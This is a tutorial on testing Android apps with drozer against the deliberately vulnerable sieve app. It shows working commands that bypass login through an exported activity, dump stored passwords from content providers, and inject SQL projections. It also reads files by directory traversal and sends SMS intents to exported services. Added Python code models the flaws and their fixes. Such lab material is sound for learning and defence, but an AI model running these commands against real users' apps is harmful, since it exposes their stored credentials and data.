Table of Contents
- drozer download
- drozer installation
- sieve (drozer test program)
- drozer use
- Establish a connection between the mobile phone and the PC
- Determine the attack surface
- Test activities exported (easy to bypass login verification)
- Test content provider (easy to cause database leaks, SQL injection, etc.)
- Use exposed content provider for SQL injection
- Get information from File System-backed Content Providers
- Test services exported (privilege escalation)
- Test broadcast receivers exported (denial of service)
drozer download
Download link: drozer
drozer installation
Download the software and decompress it, enter the extracted directory and run setup.exe, following the prompts to complete the installation (it installs to the C: drive by default).
Transfer agent.apk to the phone and install it.
sieve (drozer test program)
Download link: sieve
Introduction: sieve is a small password-management app that contains common Android application vulnerabilities and can be used as a practice target for drozer.
Usage: When sieve is started for the first time, it requires the user to set a 16-character "master password" and a 4-digit PIN to protect the passwords the user will enter later. Users can store passwords for various services in sieve and retrieve them later after supplying the correct credentials.
drozer use
Establish a connection between the mobile phone and the PC
1. Open the drozer agent on the mobile phone and turn on Embedded Server.
2. On the PC, set up port forwarding through ADB.
3. On the PC, open a command prompt in the drozer installation directory and execute the connection command; the connection to the drozer agent on the phone is established.
Precautions
If the error "could not find java..." is reported, create a file named .drozer_config in the C:\Users\XXX\ directory (where XXX is the current user name) with the following content, replacing the paths with the locations of your java and javac:
[executables]
java=D:\Java\jdk1.7.0_65\bin\java.exe
javac=D:\Java\jdk1.7.0_65\bin\javac.exe
Save the file and reconnect.
Determine the attack surface
dz> run app.package.list //List all installed application package names
dz> run app.package.list -f sieve //Search for a specific package name
dz> run app.package.info -a com.mwr.example.sieve //View application information
dz> run app.package.attacksurface com.mwr.example.sieve //Identify the attack surface
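The enumeration that app.package.attacksurface performs can also be done statically from the app's own AndroidManifest.xml. The following Python script is an added example (not part of the original page or of drozer) that applies the platform's default-export rules to a constructed sample manifest; the package and component names in it are made up for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "provider", "service", "receiver")

# Constructed sample manifest (not the real sieve manifest), targeting API 16.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.demo">
  <uses-sdk android:targetSdkVersion="16"/>
  <application>
    <activity android:name=".PWList" android:exported="true"/>
    <activity android:name=".SettingsActivity" android:exported="false"/>
    <provider android:name=".DBContentProvider"
              android:authorities="com.example.demo.DBContentProvider"/>
    <service android:name=".AuthService" android:exported="true"
             android:permission="com.example.demo.USE_AUTH"/>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""


def attr(el, name):
    return el.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(el, target_sdk):
    # An explicit android:exported attribute always wins.
    explicit = attr(el, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    # Providers without the attribute were exported by default before API 17.
    if el.tag == "provider":
        return target_sdk < 17
    # Activities, services and receivers default to exported iff they declare an intent-filter.
    return el.find("intent-filter") is not None


def attack_surface(manifest_xml):
    """Return {tag: [(name, permission)]} for every exported component."""
    root = ET.fromstring(manifest_xml)
    sdk = root.find("uses-sdk")
    target_sdk = int(attr(sdk, "targetSdkVersion") or 1) if sdk is not None else 1
    surface = {tag: [] for tag in COMPONENT_TAGS}
    for el in root.iter():
        if el.tag in COMPONENT_TAGS and is_exported(el, target_sdk):
            surface[el.tag].append((attr(el, "name"), attr(el, "permission")))
    return surface
```

A component that is exported but carries no permission (the provider and receiver in the sample) is the kind of entry the later sections of this page probe.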
Test activities exported (easy to bypass login verification)
dz> run app.activity.info -a com.mwr.example.sieve //Display exposed Activity information
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList //This command will generate a suitable intent to start the activity
Looking at the phone, sieve's password list is displayed without any login verification: the activity can be entered directly.
Test content provider (easy to cause database leaks, SQL injection, etc.)
dz> run app.provider.info -a com.mwr.example.sieve //List Content Provider information
dz> run app.provider.finduri com.mwr.example.sieve //Enumerate URIs
dz> run scanner.provider.finduris -a com.mwr.example.sieve //Use the scanner to enumerate URIs
dz> run scanner.provider.injection -a com.mwr.example.sieve //Detect accessible URIs and test them for SQL injection
Now other drozer modules can be used to retrieve information from these content URIs and even modify data in the database.
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ //Get database data (that is, the previously saved password and email information)
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/ --vertical //Display database data vertically
Use exposed content provider for SQL injection
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/ --projection "'" //The database returns an error message that reveals the SQL query statement, which can then be used to construct a query for the desired database information
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/ --selection "'"
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';-- " //Use SQL injection to list all tables in the database
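The injection above works because the provider concatenates the caller's projection and selection strings into its SELECT statement. The Python model below is an added example, not sieve's or drozer's code: it reproduces that query-building pattern against a constructed in-memory SQLite table and, beside it, the hardened form that allowlists column names and binds the filter value as a parameter.

```python
import sqlite3

# Columns a caller may select; the password column is deliberately not exposed.
ALLOWED_COLUMNS = ("_id", "service", "username")


def make_db():
    """Constructed in-memory stand-in for a password manager's Passwords table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Passwords(_id INTEGER PRIMARY KEY, service TEXT,
                               username TEXT, password BLOB);
        INSERT INTO Passwords(service, username, password)
            VALUES ('mail', 'alice', X'DEADBEEF');
    """)
    return db


def query_vulnerable(db, projection, selection=None):
    # Models a provider that pastes caller-controlled strings into the SQL text:
    # SELECT <projection> FROM Passwords [WHERE <selection>]
    sql = "SELECT %s FROM Passwords" % ", ".join(projection)
    if selection:
        sql += " WHERE " + selection
    return db.execute(sql).fetchall()


def query_hardened(db, projection, filter_column, value):
    # Column names must come from the fixed allowlist, so interpolating them is safe;
    # the caller's value never touches the SQL text and is bound as a parameter.
    for col in list(projection) + [filter_column]:
        if col not in ALLOWED_COLUMNS:
            raise ValueError("unknown column: %r" % col)
    sql = "SELECT %s FROM Passwords WHERE %s = ?" % (", ".join(projection), filter_column)
    return db.execute(sql, (value,)).fetchall()
```

In the vulnerable form a projection such as "name FROM sqlite_master WHERE type='table' --" rewrites the whole statement and returns the schema; the hardened form rejects it before any SQL is built.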
Get information from File System-backed Content Providers
dz> run scanner.provider.traversal -a com.mwr.example.sieve //Detect directory traversal
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts //Read an arbitrary file through the provider (directory traversal)
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/database/database.db /home/user/database.db //Download the specified file to the specified directory (specifying a Windows directory is not recommended because it causes problems; download into the drozer home directory instead)
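The traversal above is possible because the file-backed provider maps the URI path straight onto the filesystem. The following Python function is an added example (not sieve's code) of the confinement check such a provider should perform before opening a file; ALLOWED_ROOT is a constructed example path.

```python
import posixpath

# Constructed example root; a real provider would use its own files directory.
ALLOWED_ROOT = "/data/data/com.example.demo/files/backup"


def resolve_backup_path(uri_path):
    """Map the path part of a content URI onto a file under ALLOWED_ROOT.

    A provider that joins the raw URI path onto a root, or uses it directly,
    lets '..' segments or an absolute path reach any file the app can read.
    """
    # Treat the URI path as relative to the root even if it starts with '/'.
    relative = uri_path.lstrip("/")
    # normpath collapses '.' and '..' so that the prefix test below is meaningful.
    candidate = posixpath.normpath(posixpath.join(ALLOWED_ROOT, relative))
    # Reject anything that normalised to the root itself or to a path outside it.
    if candidate == ALLOWED_ROOT or not candidate.startswith(ALLOWED_ROOT + "/"):
        raise PermissionError("path escapes provider root: %r" % uri_path)
    return candidate
```

Symlinks are not resolved here; at open time the provider should also canonicalise against the real filesystem and repeat the prefix check.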
Test services exported (privilege escalation)
dz> run app.service.info -a com.android.nsf //Get service details
dz> run app.service.send com.android.nsf com.igexin.sdk.PushServiceUser --msg 1 2 3 //Access
dz> run app.service.start --action com.test.vulnerability.SEND_SMS --extra string dest 11111 --extra string text 1111 --extra string OP SEND_SMS
Test broadcast receivers exported (denial of service)
dz> run app.broadcast.info -a com.android.nsf //Get broadcast receiver information